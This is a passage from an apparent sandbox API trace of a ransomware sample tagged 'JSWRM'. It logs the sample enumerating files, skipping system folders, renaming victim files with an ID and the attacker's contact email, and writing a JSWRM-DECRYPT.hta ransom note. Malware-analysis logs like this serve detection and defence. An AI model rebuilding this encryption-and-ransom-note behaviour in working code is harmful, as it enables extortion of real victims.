lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.652] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.652] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.653] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.653] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10091077203908896) returned 0 [0068.653] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.653] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.653] CloseHandle (hObject=0xffffffff) returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0068.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.654] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0068.654] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.654] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.654] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2=".") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="..") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="...") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="windows") returned -1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="recovery") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="perflogs") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="documents and settings") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="system volume information") returned -1 [0068.654] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="msocache") returned 1 [0068.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe", lpUsedDefaultChar=0x0) returned 18 [0068.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe", cchWideChar=18, lpMultiByteStr=0x241290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe", lpUsedDefaultChar=0x0) returned 18 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.655] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2=".") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="..") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="...") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="windows") returned -1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="recovery") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="perflogs") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="documents and settings") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="$RECYCLE.BIN") returned 1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="system volume information") returned -1 [0068.655] lstrcmpiW (lpString1="sk-SK", lpString2="msocache") returned 1 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\jswrm-decrypt.hta")) returned 0xffffffff [0068.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.665] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.665] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.666] CloseHandle (hObject=0x454) returned 1 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.666] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\jswrm-decrypt.hta")) returned 0x20 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0068.666] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0068.666] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.667] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.667] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.667] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.667] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f96e58e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f96e58e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f96e58e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.667] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0068.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0068.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.667] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.667] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.667] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.667] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.667] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.668] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 